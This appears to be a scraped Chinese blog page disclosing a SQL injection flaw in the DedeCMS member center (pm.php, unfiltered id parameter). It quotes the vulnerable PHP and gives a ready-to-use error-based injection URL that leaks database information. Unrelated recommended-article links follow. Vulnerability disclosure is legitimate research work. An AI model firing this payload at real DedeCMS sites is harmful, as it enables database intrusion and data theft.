member pm.php,Dedecms 会员中心注入漏洞5
漏洞作者: Matt
[php]member/pm.php
else if($dopost=='read')
{
$sql = "SELECT * FROM `#@__member_friends` WHERE mid='{$cfg_ml->M_ID}' AND ftype!='-1' ORDER BY addtime DESC LIMIT 20";
$friends = array();
$dsql->SetQuery($sql);
$dsql->Execute();
while ($row = $dsql->GetArray()) {
$friends[] = $row;
}
$row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID没过滤
if(!is_array($row))
{
ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
exit();
}
$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");
$dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");
include_once(dirname(__FILE__).'/templets/pm-read.htm');
exit();
}
[/php]
漏洞证明:
测试方法http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and @`'` and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
member pm.php,Dedecms 会员中心注入漏洞5相关推荐
- php制作会员签到打开,【PHP】织梦dedecms会员中心模板带会员签到赚金币功能
一:将member文件夹上传覆盖网站根目录 二:后台添加统一页头页尾调用模板(具体操作请见截图) 三:在系统-SQL命令行工具中运行一下SQL创建数据库: (此为utf-8) CREATE TABLE ...
- dedeCMS 会员中心注册登陆页面 - 模板修改
dedeCMS 会员中心:注册登陆页面(logo.版权信息等)的修改问题 一. 模板文件路径及修改业务: 文件名 member\templets\ 涉及页面 修改业务 涉及图片名称 reg-new.h ...
- 织梦php版本图片不能上传,织梦Dedecms会员中心无法上传图片的解决方法
织梦Dedecms会员中心,由于为了安全性问题,限制了注册会员在会员中心发布信息的时候上传图片,但是管理员登录会员中心发布信息的时候上传图片却不受影响.那该如何解决呢?下面我们来说明一下具体的解决方案 ...
- 织梦dedecms search.php注入漏洞exp,DedeCms V57 plus/search.php 文件SQL注射0day漏洞
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋. Hackme论坛原创 转载请附带原文链接 作者: c4rp3nt3r ...
- 小刀娱乐网:dedecms 会员中心调用会员最后登录时间 和上次登录ip
在会员中心的任意模板中可以调用以下自定义函数 <?php echo login_time_ip($cfg_ml->M_ID);?> 将以下函数放到include/extend.fun ...
- 织梦dedecms会员中心投稿,管理员审核后,文档稿件动态浏览,禁止生成静态页
后台模型管理中,会员稿件默认状态,官方默认只有三个选项.如果选择投稿后未审核,那么.后台审核后,文档会自动生成静态页.没法动态浏览.解决办法是增加一个选项.如图 需要修改三个文件 一是,后台模板目录中 ...
- member.php?mod=register文件在哪里,DEDECMS修改member会员中心文件夹名称 更改member目录名称...
DEDECMS做站过程中有时候不可避免被各种营销软件强行发布广告,因此为了避免这个情况,我们要嘛是加强注册审核,要嘛就是参考我们这篇文章,将会员中心文件夹完全改名,避免被特征扫描到. 下面是操作方法: ...
- album add.php 修复,dedecms SQL注入漏洞 member/album_add.php 修复
dedecms的/dedecms/member/album_add.php文件中,对输入参数mtypesid未进行int整型转义,导致SQL注入的发生. 打开文件:/member/album_add. ...
- /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...
最新文章
- 计算机视觉经典任务分类
- Newtonsoft.Json使用
- java 错误声音播放器_java 音频播放器出不了声音,代码里哪有问题啊?
- HTML5数据库建模,HTML5的五种客户端离线存储方案
- wordpress使用retro方案出现413 Request Entity Too Large(Activate还是有问题)
- SQLite编译问题
- 利用“多说”制作留言板、评论系统
- 计算机导论布尔运算,计算机导论第2讲-符号化-计算化-自动化.pdf
- 满纸辛酸泪 —— 红楼梦中话
- 172.阶乘后的零 (力扣leetcode) 博主可答疑该问题
- 《中國姓氏大全》【带拼音】
- 乐优商城遇到的坑(二):Day56 品牌管理之虚拟机CentOS6.5我真的不会装
- python 制作抽奖箱_海安当地横幅制作值得推荐,抽奖箱制作-漫谈
- 《天涯明月刀》服务器端3D引擎设计与开发
- php的rps,如何理解RPS的本质
- linux huge模式设置,Linux 下 Hugepages的配置
- 如何在Java中写模糊查询
- 为啥VUE和React都选择hooks
- python圣诞雪人
- 【笔记】编程的原则:改善代码质量的101个方法
热门文章
- Java千百问_07JVM架构(001)_java内存模型是什么样的
- SPOJ Problem 22:Triangle From Centroid
- 利用Linq2Sql+Juqery实现通用查询功能
- C# Reflection
- 《陪孩子像搭积木一样学编程》,一起来玩Scratch(1)使用Scratch编程的基本流程...
- call、apply、bind的区别,模拟call、apply和bind的实现
- Linux centosVMware shell编程 for循环、while循环、break跳出循环、continue结束本次循环、exit退出整个脚本...
- ES6 的遍历器接口 Iterator
- 本人复习总结全部资料及其简历供大家參考
- 微信公众平台开发之留言板